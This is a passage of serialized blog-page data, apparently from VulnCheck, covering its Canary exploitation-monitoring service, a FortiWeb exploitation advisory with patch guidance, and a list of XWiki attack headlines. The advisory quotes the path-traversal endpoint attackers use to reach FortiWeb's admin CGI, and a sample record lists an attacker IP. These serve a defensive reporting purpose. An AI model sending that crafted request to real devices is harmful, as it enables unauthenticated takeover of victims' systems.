2Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-21",[1373,29064,183],{"class":9173},[1373,29066,9062],{"class":1383},[1373,29068,29069,29071,29073,29075,29077,29079,29082],{"class":1375,"line":7648},[1373,29070,28875],{"class":9152},[1373,29072,12998],{"class":9165},[1373,29074,183],{"class":9152},[1373,29076,4606],{"class":1383},[1373,29078,4883],{"class":9173},[1373,29080,29081],{"class":9176},"2025-10-21T11:28:34.748Z",[1373,29083,19057],{"class":9173},[1373,29085,29086],{"class":1375,"line":7672},[1373,29087,28912],{"class":1383},[1373,29089,29090],{"class":1375,"line":7688},[1373,29091,9788],{"class":1383},[1373,29093,29094,29096,29098,29100,29102,29104,29107,29109],{"class":1375,"line":7709},[1373,29095,28875],{"class":9152},[1373,29097,7585],{"class":9165},[1373,29099,183],{"class":9152},[1373,29101,4606],{"class":1383},[1373,29103,4883],{"class":9173},[1373,29105,29106],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-22",[1373,29108,183],{"class":9173},[1373,29110,9062],{"class":1383},[1373,29112,29113,29115,29117,29119,29121,29123,29126],{"class":1375,"line":7714},[1373,29114,28875],{"class":9152},[1373,29116,12998],{"class":9165},[1373,29118,183],{"class":9152},[1373,29120,4606],{"class":1383},[1373,29122,4883],{"class":9173},[1373,29124,29125],{"class":9176},"2025-10-22T03:31:40.775Z",[1373,29127,19057],{"class":9173},[1373,29129,29130],{"class":1375,"line":7722},[1373,29131,28912],{"class":1383},[1373,29133,29134],{"class":1375,"line":9903},[1373,29135,9788],{"class":1383},[1373,29137,29138,29140,29142,29144,29146,29148,29151,29153],{"class":1375,"line":9908},[1373,29139,28875],{"class":9152},[1373,29141,7585],{"class":9165},[1373,29143,183],{"class":9152},[1373,29145,4606],{"class":1383},[1373,29147,4883],{"class":9173},[1373,29149,29150],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-23",[1373,
29152,183],{"class":9173},[1373,29154,9062],{"class":1383},[1373,29156,29157,29159,29161,29163,29165,29167,29170],{"class":1375,"line":9913},[1373,29158,28875],{"class":9152},[1373,29160,12998],{"class":9165},[1373,29162,183],{"class":9152},[1373,29164,4606],{"class":1383},[1373,29166,4883],{"class":9173},[1373,29168,29169],{"class":9176},"2025-10-23T06:40:46.346Z",[1373,29171,19057],{"class":9173},[1373,29173,29174],{"class":1375,"line":9932},[1373,29175,28912],{"class":1383},[1373,29177,29178],{"class":1375,"line":9937},[1373,29179,9788],{"class":1383},[1373,29181,29182,29184,29186,29188,29190,29192,29195,29197],{"class":1375,"line":9957},[1373,29183,28875],{"class":9152},[1373,29185,7585],{"class":9165},[1373,29187,183],{"class":9152},[1373,29189,4606],{"class":1383},[1373,29191,4883],{"class":9173},[1373,29193,29194],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-10-29",[1373,29196,183],{"class":9173},[1373,29198,9062],{"class":1383},[1373,29200,29201,29203,29205,29207,29209,29211,29214],{"class":1375,"line":9962},[1373,29202,28875],{"class":9152},[1373,29204,12998],{"class":9165},[1373,29206,183],{"class":9152},[1373,29208,4606],{"class":1383},[1373,29210,4883],{"class":9173},[1373,29212,29213],{"class":9176},"2025-10-29T10:01:15.64Z",[1373,29215,19057],{"class":9173},[1373,29217,29218],{"class":1375,"line":15955},[1373,29219,28912],{"class":1383},[1373,29221,29222],{"class":1375,"line":16030},[1373,29223,9788],{"class":1383},[1373,29225,29226,29228,29230,29232,29234,29236,29239,29241],{"class":1375,"line":16035},[1373,29227,28875],{"class":9152},[1373,29229,7585],{"class":9165},[1373,29231,183],{"class":9152},[1373,29233,4606],{"class":1383},[1373,29235,4883],{"class":9173},[1373,29237,29238],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-01",[1373,29240,183],{"class":9173},[1373,29242,9062],{"class":1383},[
1373,29244,29245,29247,29249,29251,29253,29255,29257],{"class":1375,"line":16083},[1373,29246,28875],{"class":9152},[1373,29248,12998],{"class":9165},[1373,29250,183],{"class":9152},[1373,29252,4606],{"class":1383},[1373,29254,4883],{"class":9173},[1373,29256,28483],{"class":9176},[1373,29258,19057],{"class":9173},[1373,29260,29261],{"class":1375,"line":16098},[1373,29262,28912],{"class":1383},[1373,29264,29265],{"class":1375,"line":16103},[1373,29266,9788],{"class":1383},[1373,29268,29269,29271,29273,29275,29277,29279,29282,29284],{"class":1375,"line":16147},[1373,29270,28875],{"class":9152},[1373,29272,7585],{"class":9165},[1373,29274,183],{"class":9152},[1373,29276,4606],{"class":1383},[1373,29278,4883],{"class":9173},[1373,29280,29281],{"class":9176},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fvulncheck-canaries?cve=CVE-2025-2611&date=2025-11-03",[1373,29283,183],{"class":9173},[1373,29285,9062],{"class":1383},[1373,29287,29288,29290,29292,29294,29296,29298,29301],{"class":1375,"line":16153},[1373,29289,28875],{"class":9152},[1373,29291,12998],{"class":9165},[1373,29293,183],{"class":9152},[1373,29295,4606],{"class":1383},[1373,29297,4883],{"class":9173},[1373,29299,29300],{"class":9176},"2025-11-03T12:58:29.691Z",[1373,29302,19057],{"class":9173},[1373,29304,29305],{"class":1375,"line":16164},[1373,29306,9861],{"class":1383},[1373,29308,29309],{"class":1375,"line":16170},[1373,29310,28828],{"class":1383},[1373,29312,29313,29315,29318,29320,29322,29324],{"class":1375,"line":16187},[1373,29314,26357],{"class":9152},[1373,29316,29317],{"class":9155},"reported_exploited_by_vulncheck_canaries",[1373,29319,183],{"class":9152},[1373,29321,4606],{"class":1383},[1373,29323,14986],{"class":7054},[1373,29325,9062],{"class":1383},[1373,29327,29328,29330,29332,29334,29336,29338,29340,29342],{"class":1375,"line":16198},[1373,29329,26357],{"class":9152},[1373,29331,12998],{"class":9155},[1373,29333,183],{"class":9152},[1373,29335,4606],{"class":1383},[1373,29
337,4883],{"class":9173},[1373,29339,28905],{"class":9176},[1373,29341,183],{"class":9173},[1373,29343,9062],{"class":1383},[1373,29345,29346,29348,29350,29352,29354,29356,29359],{"class":1375,"line":16204},[1373,29347,26357],{"class":9152},[1373,29349,26501],{"class":9155},[1373,29351,183],{"class":9152},[1373,29353,4606],{"class":1383},[1373,29355,4883],{"class":9173},[1373,29357,29358],{"class":9176},"2025-11-03T13:27:52.697389321Z",[1373,29360,19057],{"class":9173},[1373,29362,29363],{"class":1375,"line":16210},[1373,29364,4795],{"class":1383},[1373,29366,29367],{"class":1375,"line":16254},[1373,29368,29369],{"class":4640},"  ]\n",[1373,29371,29372],{"class":1375,"line":18499},[1373,29373,1855],{"class":4640},[18,29375,29376],{},"Also an additional event has been added to the VulnCheck Console’s CVE timeline labeled “First Canary Exploitation.” This gives all community users visibility into real exploitation as soon as it’s observed.",[18,29378,29379],{},[68,29380],{"alt":29381,"src":29382},"cve-2025-2611.png","\u002Fcve-2025-2611.png",[993,29384,24853],{"id":29385},"vulncheck-exploit-vulnerability-intelligence",[18,29387,29388],{},"VulnCheck Exploit & Vulnerability Intelligence customers will now see Canary data integrated into vulncheck-nvd, vulncheck-nvd2, and exploits indices. Each exploit record includes Canary observation links and the new boolean field “reported_exploited_by_vulncheck_canaries”, allowing users to instantly filter and prioritize CVEs that have been verified through real exploitation.",[993,29390,29392],{"id":29391},"vulncheck-ip-intelligence","VulnCheck IP Intelligence",[18,29394,29395,29396,29399],{},"Canary data is also incorporated into ",[47,29397,29392],{"href":1249,"rel":29398},[51],". IPs associated with exploitation observed by Canaries are included alongside the corresponding CVE, attacker country, and first-seen timestamp. 
For example:",[1354,29401,29403],{"className":22307,"code":29402,"language":22309,"meta":219,"style":219},"{\n      \"ip\": \"159.65.227.190\",\n      \"port\": 38761,\n      \"ssl\": false,\n      \"lastSeen\": \"2025-11-01T12:03:20.969Z\",\n      \"asn\": \"AS14061\",\n      \"country\": \"United States\",\n      \"country_code\": \"US\",\n      \"city\": \"North Bergen\",\n      \"cve\": [\n        \"CVE-2025-2611\"\n      ],\n      \"matches\": [\n        \"VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt\"\n      ],\n      \"hostnames\": [],\n      \"type\": {\n        \"id\": \"vulncheck-canaries\",\n        \"kind\": \"\",\n        \"finding\": \"Web Application Attack\"\n      },\n      \"feed_ids\": [\n        \"1319334194617328\"\n      ],\n      \"_timestamp\": \"2025-11-01T12:03:20.969Z\"\n    },\n",[886,29404,29405,29409,29427,29441,29455,29473,29492,29510,29528,29547,29559,29567,29571,29583,29591,29595,29607,29619,29638,29652,29668,29672,29684,29693,29697,29713],{"__ignoreMap":219},[1373,29406,29407],{"class":1375,"line":1376},[1373,29408,8904],{"class":1383},[1373,29410,29411,29413,29415,29417,29419,29421,29423,29425],{"class":1375,"line":220},[1373,29412,26357],{"class":9152},[1373,29414,26184],{"class":9155},[1373,29416,183],{"class":9152},[1373,29418,4606],{"class":1383},[1373,29420,4883],{"class":9173},[1373,29422,28241],{"class":9176},[1373,29424,183],{"class":9173},[1373,29426,9062],{"class":1383},[1373,29428,29429,29431,29433,29435,29437,29439],{"class":1375,"line":1266},[1373,29430,26357],{"class":9152},[1373,29432,26203],{"class":9155},[1373,29434,183],{"class":9152},[1373,29436,4606],{"class":1383},[1373,29438,28258],{"class":5467},[1373,29440,9062],{"class":1383},[1373,29442,29443,29445,29447,29449,29451,29453],{"class":1375,"line":1852},[1373,29444,26357],{"class":9152},[1373,29446,26219],{"class":9155},[1373,29448,183],{"class":9152},[1373,29450,4606],{"class":1383},[1373,29452,16311],{"class":7054},[1373,29454,9062],{"class":1383},[1
373,29456,29457,29459,29461,29463,29465,29467,29469,29471],{"class":1375,"line":4692},[1373,29458,26357],{"class":9152},[1373,29460,26234],{"class":9155},[1373,29462,183],{"class":9152},[1373,29464,4606],{"class":1383},[1373,29466,4883],{"class":9173},[1373,29468,28483],{"class":9176},[1373,29470,183],{"class":9173},[1373,29472,9062],{"class":1383},[1373,29474,29475,29477,29479,29481,29483,29485,29488,29490],{"class":1375,"line":4724},[1373,29476,26357],{"class":9152},[1373,29478,26254],{"class":9155},[1373,29480,183],{"class":9152},[1373,29482,4606],{"class":1383},[1373,29484,4883],{"class":9173},[1373,29486,29487],{"class":9176},"AS14061",[1373,29489,183],{"class":9173},[1373,29491,9062],{"class":1383},[1373,29493,29494,29496,29498,29500,29502,29504,29506,29508],{"class":1375,"line":4756},[1373,29495,26357],{"class":9152},[1373,29497,26274],{"class":9155},[1373,29499,183],{"class":9152},[1373,29501,4606],{"class":1383},[1373,29503,4883],{"class":9173},[1373,29505,1494],{"class":9176},[1373,29507,183],{"class":9173},[1373,29509,9062],{"class":1383},[1373,29511,29512,29514,29516,29518,29520,29522,29524,29526],{"class":1375,"line":4768},[1373,29513,26357],{"class":9152},[1373,29515,26293],{"class":9155},[1373,29517,183],{"class":9152},[1373,29519,4606],{"class":1383},[1373,29521,4883],{"class":9173},[1373,29523,23799],{"class":9176},[1373,29525,183],{"class":9173},[1373,29527,9062],{"class":1383},[1373,29529,29530,29532,29534,29536,29538,29540,29543,29545],{"class":1375,"line":4792},[1373,29531,26357],{"class":9152},[1373,29533,26312],{"class":9155},[1373,29535,183],{"class":9152},[1373,29537,4606],{"class":1383},[1373,29539,4883],{"class":9173},[1373,29541,29542],{"class":9176},"North 
Bergen",[1373,29544,183],{"class":9173},[1373,29546,9062],{"class":1383},[1373,29548,29549,29551,29553,29555,29557],{"class":1375,"line":4798},[1373,29550,26357],{"class":9152},[1373,29552,242],{"class":9155},[1373,29554,183],{"class":9152},[1373,29556,4606],{"class":1383},[1373,29558,26352],{"class":1383},[1373,29560,29561,29563,29565],{"class":1375,"line":4806},[1373,29562,28414],{"class":9173},[1373,29564,23717],{"class":9176},[1373,29566,19057],{"class":9173},[1373,29568,29569],{"class":1375,"line":4817},[1373,29570,28828],{"class":1383},[1373,29572,29573,29575,29577,29579,29581],{"class":1375,"line":4825},[1373,29574,26357],{"class":9152},[1373,29576,26345],{"class":9155},[1373,29578,183],{"class":9152},[1373,29580,4606],{"class":1383},[1373,29582,26352],{"class":1383},[1373,29584,29585,29587,29589],{"class":1375,"line":4835},[1373,29586,28414],{"class":9173},[1373,29588,23853],{"class":9176},[1373,29590,19057],{"class":9173},[1373,29592,29593],{"class":1375,"line":4843},[1373,29594,28828],{"class":1383},[1373,29596,29597,29599,29601,29603,29605],{"class":1375,"line":4849},[1373,29598,26357],{"class":9152},[1373,29600,26373],{"class":9155},[1373,29602,183],{"class":9152},[1373,29604,4606],{"class":1383},[1373,29606,26338],{"class":1383},[1373,29608,29609,29611,29613,29615,29617],{"class":1375,"line":4877},[1373,29610,26357],{"class":9152},[1373,29612,26399],{"class":9155},[1373,29614,183],{"class":9152},[1373,29616,4606],{"class":1383},[1373,29618,4765],{"class":1383},[1373,29620,29621,29623,29625,29627,29629,29631,29634,29636],{"class":1375,"line":4915},[1373,29622,28414],{"class":9152},[1373,29624,26412],{"class":9165},[1373,29626,183],{"class":9152},[1373,29628,4606],{"class":1383},[1373,29630,4883],{"class":9173},[1373,29632,29633],{"class":9176},"vulncheck-canaries",[1373,29635,183],{"class":9173},[1373,29637,9062],{"class":1383},[1373,29639,29640,29642,29644,29646,29648,29650],{"class":1375,"line":4931},[1373,29641,28414],{"class":9152},[1373,29643,26432]
,{"class":9165},[1373,29645,183],{"class":9152},[1373,29647,4606],{"class":1383},[1373,29649,16579],{"class":9173},[1373,29651,9062],{"class":1383},[1373,29653,29654,29656,29658,29660,29662,29664,29666],{"class":1375,"line":4947},[1373,29655,28414],{"class":9152},[1373,29657,26452],{"class":9165},[1373,29659,183],{"class":9152},[1373,29661,4606],{"class":1383},[1373,29663,4883],{"class":9173},[1373,29665,23873],{"class":9176},[1373,29667,19057],{"class":9173},[1373,29669,29670],{"class":1375,"line":4952},[1373,29671,28468],{"class":1383},[1373,29673,29674,29676,29678,29680,29682],{"class":1375,"line":6776},[1373,29675,26357],{"class":9152},[1373,29677,26475],{"class":9155},[1373,29679,183],{"class":9152},[1373,29681,4606],{"class":1383},[1373,29683,26352],{"class":1383},[1373,29685,29686,29688,29691],{"class":1375,"line":6781},[1373,29687,28414],{"class":9173},[1373,29689,29690],{"class":9176},"1319334194617328",[1373,29692,19057],{"class":9173},[1373,29694,29695],{"class":1375,"line":7524},[1373,29696,28828],{"class":1383},[1373,29698,29699,29701,29703,29705,29707,29709,29711],{"class":1375,"line":7530},[1373,29700,26357],{"class":9152},[1373,29702,26501],{"class":9155},[1373,29704,183],{"class":9152},[1373,29706,4606],{"class":1383},[1373,29708,4883],{"class":9173},[1373,29710,28483],{"class":9176},[1373,29712,19057],{"class":9173},[1373,29714,29715,29717],{"class":1375,"line":7546},[1373,29716,28032],{"class":1383},[1373,29718,9062],{"class":4640},[61,29720,1903],{"id":1902},[18,29722,29723],{},"VulnCheck Canary Intelligence gives defenders something they desperately need: verified, real-time visibility into active exploitation across the internet. It transforms exploitation from something discovered after the fact into something defenders can monitor as it happens. 
By integrating Canary data across VulnCheck products, customers gain:",[22,29725,29726,29729,29732,29735],{},[25,29727,29728],{},"Immediate awareness of CVEs being exploited in the wild",[25,29730,29731],{},"Earlier detection and prioritization of vulnerabilities that actually matter",[25,29733,29734],{},"Attribution insight linking attacker IPs, infrastructure, and payloads",[25,29736,29737],{},"Contextual enrichment across VulnCheck KEV, Exploit & Vulnerability Intelligence, and IP Intelligence datasets",[18,29739,29740],{},"Defenders can now act on ground-truth exploitation telemetry, not assumptions, not lab data, and not delayed reporting. VulnCheck Canary Intelligence turns live attacks into early warning.",[18,29742,29743,29744,29749],{},"Get started: create an account to request a Canary Intelligence trial, access real-world exploit listings now via the free VulnCheck KEV, or explore ongoing Canary exploitation trends on our ",[47,29745,29748],{"href":29746,"rel":29747},"https:\u002F\u002Fresearch.vulncheck.com\u002Fcanary-kev",[51],"VulnCheck Research"," site.",[18,29751,29752],{},[295,29753,202],{},[18,29755,29756,29757,1554,29761,59],{},"VulnCheck is the exploit intelligence company helping enterprise, global government organizations and cybersecurity vendors respond to new vulnerabilities and emerging threats faster with more context. Trusted by the world's largest organizations, VulnCheck protects hundreds of millions of systems and people worldwide, enabling them to outpace adversaries with threat intelligence solutions purpose-built for machine-level consumption and response actioning at scale. VulnCheck’s threat intelligence offerings equip teams with comprehensive, real-time exploit and vulnerability intelligence, first-party attack visibility and essential detections that are autonomously correlated and machine-readable, enabling emerging threat response in software vs human analysis. 
Follow the company on ",[47,29758,12204],{"href":29759,"rel":29760},"https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fvulncheck\u002F",[51],[47,29762,29765],{"href":29763,"rel":29764},"https:\u002F\u002Fx.com\u002Fvulncheckai",[51],"X",[2901,29767,29768],{},"",{"title":219,"searchDepth":220,"depth":220,"links":29770},[29771,29772,29773,29774,29779],{"id":28166,"depth":220,"text":19621},{"id":28175,"depth":220,"text":28176},{"id":28191,"depth":220,"text":28192},{"id":28659,"depth":220,"text":28660,"children":29775},[29776,29777,29778],{"id":28666,"depth":1266,"text":28667},{"id":29385,"depth":1266,"text":24853},{"id":29391,"depth":1266,"text":29392},{"id":1902,"depth":220,"text":1903},"2025-11-17","Introducing VulnCheck Canary Intelligence, a new offering that captures real-world exploitation as it happens.",{"slug":29783},"introducing-vulncheck-canary-intelligence","\u002Fblog\u002Fintroducing-vulncheck-canary-intelligence",{"title":28149,"description":29781},"blog\u002Fintroducing-vulncheck-canary-intelligence",[2941,1281,1279],"zFI6qy6iL7VdyjpuawZz4KRP3Hf0DdmmLD_mmWZ3Fxk",{"id":29790,"title":19437,"articles":29791,"authors":29811,"body":29814,"date":29988,"description":29989,"extension":234,"image":7,"link":7,"meta":29990,"navigation":237,"path":29992,"seo":29993,"series":7,"stem":29994,"subtype":7,"tags":29995,"__hash__":29996},"blog\u002Fblog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability.md",[29792,29795,29798,29802,29806,29807],{"title":29793,"source":10841,"link":29794,"date":29780},"Critical vulnerability in Fortinet FortiWeb is under exploitation","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fcritical-vulnerability-in-fortinet-fortiweb-is-under-exploitation\u002F805688\u002F",{"title":29796,"source":11218,"link":29797,"date":29780},"Critical Fortinet FortiWeb WAF Bug Exploited in the 
Wild","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fcritical-fortinet-fortiweb-waf-bug-exploited-in-wild",{"title":29799,"source":3486,"link":29800,"date":29801},"Fortinet’s silent patch sparks alarm as a critical FortiWeb flaw is exploited in the wild","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4091939\u002Ffortinets-silent-patch-sparks-alarm-as-a-critical-fortiweb-flaw-is-exploited-in-the-wild.html","2025-11-18",{"title":29803,"source":29804,"link":29805,"date":29801},"Fortinet Silent Patch Raises Concern Among Security Researchers","The Cyber Express","https:\u002F\u002Fthecyberexpress.com\u002Ffortinet-silent-patch-raises-concern\u002F",{"title":29793,"source":10841,"link":29794,"date":28154},{"title":29808,"source":25685,"link":29809,"date":29810},"Cybersecurity News Weekly Newsletter – Fortinet, Chrome 0-Day Flaws, Cloudflare Outage and Salesforce Gainsight Breach","https:\u002F\u002Fcybersecuritynews.com\u002Fcybersecurity-news-weekly-newsletter-nov-2025\u002F","2025-11-23",[29812],{"name":256,"link":258,"avatar":257,"linkName":29813},"Caitlin Condon on LinkedIn",{"type":15,"value":29815,"toc":29983},[29816,29846,29857,29869,29876,29890,29894,29905,29922,29930,29934,29948,29950,29965],[18,29817,29818,29819,29824,29825,1246,29830,1255,29835,29840,29841,29845],{},"Over the last few days, ",[47,29820,29823],{"href":29821,"rel":29822},"https:\u002F\u002Fx.com\u002FDefusedCyber\u002Fstatus\u002F1975242250373517373",[51],"multiple"," security ",[47,29826,29829],{"href":29827,"rel":29828},"https:\u002F\u002Flabs.watchtowr.com\u002Fwhen-the-impersonation-function-gets-used-to-impersonate-users-fortinet-fortiweb-auth-bypass\u002F",[51],"companies",[47,29831,29834],{"href":29832,"rel":29833},"https:\u002F\u002Fx.com\u002FCERTCyberdef\u002Fstatus\u002F1989311517611733454",[51],"CERTs",[47,29836,29839],{"href":29837,"rel":29838},"https:\u002F\u002Fx.com\u002Fcyb3rops\u002Fstatus\u002F1988892219105845509",[51],"individuals"," have 
sounded alarms about active exploitation of a silently patched Fortinet FortiWeb vulnerability that is being leveraged to add new (administrative) users, enabling compromise of target devices. Fortinet has not published any information on why the vulnerability was silently patched and initially failed to receive a CVE or a security bulletin. The ",[47,29842,14853],{"href":29843,"rel":29844},"https:\u002F\u002Fdocs.fortinet.com\u002Fdocument\u002Ffortiweb\u002F8.0.2\u002Frelease-notes\u002F091537\u002Fresolved-issues",[51]," for the latest version of FortiWeb (8.0.2) make no mention of a related issue or fix.",[18,29847,29848,29851,29852,29856],{},[295,29849,29850],{},"Update:"," As of 11 AM ET on November 14, Fortinet has ",[47,29853,22232],{"href":29854,"rel":29855},"https:\u002F\u002Fwww.fortiguard.com\u002Fpsirt\u002FFG-IR-25-910",[51]," an advisory and assigned CVE-2025-64446 to a path confusion vulnerability in the Fortiweb GUI.",[18,29858,29859,29860,29865,29866],{},"According to ",[47,29861,29864],{"href":29862,"rel":29863},"https:\u002F\u002Fwww.pwndefend.com\u002F2025\u002F11\u002F13\u002Fsuspected-fortinet-zero-day-exploited-in-the-wild\u002F",[51],"PwnDefend",", adversaries are executing payloads via POST requests to the following endpoint: ",[886,29867,29868],{},"\u002Fapi\u002Fv2.0\u002Fcmdb\u002Fsystem\u002Fadmin%3F\u002F..\u002F..\u002F..\u002F..\u002F..\u002Fcgi-bin\u002Ffwbcgi",[18,29870,29871,29872,29875],{},"watchTowr has a write-up of the attack flow ",[47,29873,305],{"href":29827,"rel":29874},[51],", which looks to contain two discrete vulnerabilities rather than one.",[18,29877,29878,29879,29883,29884,29889],{},"ASM queries show varying volumes of FortiWeb exposed to the public internet, with Shodan ",[47,29880,26452],{"href":29881,"rel":29882},"https:\u002F\u002Fwww.shodan.io\u002Fsearch?query=http.title%3A%22FortiWeb%22+-Server",[51]," a little under 300 instances (once honeypots have been filtered out) and FOFA 
",[47,29885,29888],{"href":29886,"rel":29887},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=dGl0bGU9IkZvcnRpV2ViIg%3D%3D",[51],"showing"," just shy of 2,700 internet-exposed instances.",[61,29891,29893],{"id":29892},"mitigation","Mitigation",[18,29895,29896,29897,29900,29901,29904],{},"Per Fortinet's ",[47,29898,5359],{"href":29854,"rel":29899},[51]," for CVE-2025-64446, the vulnerability is a relative path traversal issue ",[1373,29902,29903],{},"CWE-23"," that allows unauthenticated attackers to execute administrative commands on the system via crafted HTTP or HTTPS requests. The following FortiWeb versions are affected:",[22,29906,29907,29910,29913,29916,29919],{},[25,29908,29909],{},"8.0.0 through 8.0.1 (fixed in 8.0.2 or above)",[25,29911,29912],{},"7.6.0 through 7.6.4 (fixed in 7.6.5 or above)",[25,29914,29915],{},"7.4.0 through 7.4.9 (fixed in 7.4.10 or above)",[25,29917,29918],{},"7.2.0 through 7.2.11 (fixed in 7.2.12 or above)",[25,29920,29921],{},"7.0.0 through 7.0.11 (fixed in 7.0.12 or above)",[18,29923,29924,29925,29929],{},"FortiWeb customers should update to a fixed version on an emergency basis, disabling HTTP or HTTPS for internet-facing FortiWeb interfaces until the update is complete. As always, patching does not eradicate prior compromise — organizations should examine their devices for signs of compromise, including any unsanctioned administrative or non-admin users. Since CVE-2025-64446 has been exploited in the wild for at least a month prior to public disclosure, organizations would be well-advised to invoke incident response playbooks. 
Shadowserver ",[47,29926,14466],{"href":29927,"rel":29928},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fiot-devices\u002Ftime-series\u002F?date_range=30&vendor=fortinet&model=fortiweb+management+interface&dataset=count&limit=100&group_by=geo&stacking=stacked&auto_update=on",[51]," several hundred management interfaces exposed to the internet.",[61,29931,29933],{"id":29932},"a-note-on-silent-patching","A Note on Silent Patching",[18,29935,29936,29937,29942,29943,29947],{},"We strongly suggest that FortiWeb customers reach out to the supplier for guidance on threat hunting and IOCs, as well as to request a formal response on why no CVE or advisory was issued when the vulnerability was first fixed. Silently patching vulnerabilities is an established bad practice that enables attackers and harms defenders, particularly for devices and systems (including FortiWeb) that have ",[47,29938,29941],{"href":29939,"rel":29940},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-25257",[51],"previously"," been ",[47,29944,970],{"href":29945,"rel":29946},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-52970",[51]," in the wild. We already know security by obscurity doesn't work; adversaries monitor new product releases and are actively reverse engineering patches regardless of whether suppliers tell their customers about fixed vulnerabilities or not. When popular technology vendors fail to communicate new security issues, they are issuing an invitation to attackers while choosing to keep that same information from defenders.",[61,29949,202],{"id":201},[18,29951,29952,29953,1246,29956,1255,29961,59],{},"The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and curate. 
For more research like this, see ",[47,29954,10801],{"href":10796,"rel":29955},[51],[47,29957,29960],{"href":29958,"rel":29959},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fnovember-2025-research-highlights",[51],"VulnCheck Research Highlights: November 2025",[47,29962,29964],{"href":24024,"rel":29963},[51],"ICTBroadcast Command Injection Actively Exploited",[18,29966,1228,29967,1234,29970,1240,29973,1246,29976,29979,29980,1260],{},[47,29968,1233],{"href":10806,"rel":29969},[51],[47,29971,1239],{"href":1237,"rel":29972},[51],[47,29974,1245],{"href":1243,"rel":29975},[51],[47,29977,1251],{"href":1249,"rel":29978},[51],", and [Exploit & Vulnerability Intelligence](",[47,29981,1258],{"href":1258,"rel":29982},[51],{"title":219,"searchDepth":220,"depth":220,"links":29984},[29985,29986,29987],{"id":29892,"depth":220,"text":29893},{"id":29932,"depth":220,"text":29933},{"id":201,"depth":220,"text":202},"2025-11-14","A silently patched vulnerability (CVE-2025-64446) in Fortinet FortiWeb is being exploited in the wild to add administrative users and compromise target devices",{"slug":29991},"fortinet-fortiweb-exploitation-silent-patch","\u002Fblog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability",{"title":19437,"description":29989},"blog\u002Ffortinet-forti-web-exploitation-hits-silently-patched-vulnerability",[242,1281,1280],"O3svw3B6rOpvmQRTIgI4vO0F7GLIMcKpz6b6vAy7AgA",{"id":29998,"title":10801,"articles":29999,"authors":30030,"body":30032,"date":29988,"description":30383,"extension":234,"image":7,"link":7,"meta":30384,"navigation":237,"path":30386,"seo":30387,"series":7,"stem":30388,"subtype":7,"tags":30389,"__hash__":30390},"blog\u002Fblog\u002Fxwiki-under-increased-attack.md",[30000,30004,30007,30010,30013,30016,30019,30023,30026],{"title":30001,"source":14382,"link":30002,"date":30003},"RondoDox Exploits Unpatched XWiki Servers to Pull More Devices Into Its 
Botnet","https:\u002F\u002Fthehackernews.com\u002F2025\u002F11\u002Frondodox-exploits-unpatched-xwiki.html","2025-11-15",{"title":30005,"source":14378,"link":30006,"date":29780},"Widespread Exploitation of XWiki Vulnerability Observed","https:\u002F\u002Fwww.securityweek.com\u002Fwidespread-exploitation-of-xwiki-vulnerability-observed\u002Famp\u002F",{"title":30008,"source":25677,"link":30009,"date":29780},"Hackers Hiring Servers for Botnet by Exploiting XWiki Vulnerability in the Wild","https:\u002F\u002Fcyberpress.org\u002Fbotnet-by-exploiting-xwixi\u002F",{"title":30011,"source":25685,"link":30012,"date":29780},"Hackers Exploiting XWiki Vulnerability in the Wild to Hire the Servers for Botnet","https:\u002F\u002Fcybersecuritynews.com\u002Fxwiki-vulnerability-exploited-in-the-wild\u002F#google_vignette",{"title":30014,"source":25672,"link":30015,"date":29780},"Hackers Weaponize XWiki Flaw to Build and Rent Out Botnet Networks","https:\u002F\u002Fgbhackers.com\u002Fhackers-weaponize-xwiki-flaw\u002F",{"title":30017,"source":14390,"link":30018,"date":29780},"RondoDox expands botnet by exploiting XWiki RCE bug left unpatched since February 2025","https:\u002F\u002Fsecurityaffairs.com\u002F184702\u002Fmalware\u002Frondodox-expands-botnet-by-exploiting-xwiki-rce-bug-left-unpatched-since-february-2025.html",{"title":30020,"source":30021,"link":30022,"date":29780},"Botnets, Miners, and Reverse Shells: XWiki CVE-2025-24893 Becomes a Playground for Attackers","Enterprise Security Tech","https:\u002F\u002Fwww.enterprisesecuritytech.com\u002Fpost\u002Fbotnets-miners-and-reverse-shells-xwiki-cve-2025-24893-becomes-a-playground-for-attackers",{"title":30024,"source":12153,"link":30025,"date":29780},"XWiki bug actively exploited by multiple threat actors","https:\u002F\u002Fwww.scworld.com\u002Fnews\u002Fxwiki-bug-actively-exploited-by-multiple-threat-actors",{"title":30027,"source":14373,"link":30028,"date":30029},"RondoDox botnet exploits React2Shell flaw to breach Next.js 
